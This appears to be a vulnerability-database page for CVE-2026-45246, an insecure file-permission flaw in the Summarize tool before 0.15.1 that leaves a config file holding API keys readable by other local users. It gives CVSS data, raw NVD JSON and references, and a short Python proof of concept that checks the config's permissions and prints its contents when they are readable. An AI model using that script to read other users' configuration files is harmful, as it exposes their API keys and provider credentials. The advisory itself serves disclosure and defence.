Security Vulnerability Report
中文
CVE-2026-45246 CVSS 5.5 MEDIUM

CVE-2026-45246

Published: 2026-05-18 20:16:39
Last Modified: 2026-05-19 01:34:56
Source: [email protected]

Description

Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:* - VULNERABLE
Summarize < 0.15.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-45246: Summarize Insecure File Permissions # This script checks if the config file is readable by others due to insecure umask. import os import stat CONFIG_PATH = "/path/to/summarize/config.yml" # Replace with actual path def check_vulnerability(): if not os.path.exists(CONFIG_PATH): print(f"[!] Config file not found at {CONFIG_PATH}") return file_stat = os.stat(CONFIG_PATH) mode = file_stat.st_mode # Check if readable by group (S_IRGRP) or others (S_IROTH) is_group_readable = bool(mode & stat.S_IRGRP) is_other_readable = bool(mode & stat.S_IROTH) print(f"[*] File permissions: {oct(stat.S_IMODE(mode))}") if is_group_readable or is_other_readable: print("[+] Vulnerability confirmed! File is readable by unauthorized users.") try: with open(CONFIG_PATH, 'r') as f: print("[+] Content of the config file:") print(f.read()) except Exception as e: print(f"[!] Error reading file: {e}") else: print("[-] File permissions appear secure (not readable by group/others).") if __name__ == "__main__": check_vulnerability()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45246", "sourceIdentifier": "[email protected]", "published": "2026-05-18T20:16:38.823", "lastModified": "2026-05-19T01:34:55.510", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Summarize prior to 0.15.1 contains an insecure file permission vulnerability in the refresh-free configuration rewrite path that allows local users to read sensitive credentials by exploiting default filesystem permissions. When the refresh-free path rewrites the configuration file, it creates the replacement with default process umask permissions instead of preserving the original file permissions, exposing the config file containing API keys and provider credentials to other local users on shared Unix-like systems."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:steipete:summarize:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.15.1", "matchCriteriaId": "FDA6FF18-A9BB-4892-B428-AB85BB58E16A"}]}]}], "references": [{"url": "https://github.com/steipete/summarize/commit/9e990193650a23dab73f37d5e1964d574a44098b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/steipete/summarize/pull/217", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Patch"]}, {"url": "https://github.com/steipete/summarize/releases/tag/v0.15.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/summarize-insecure-file-permissions-information-disclosure", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.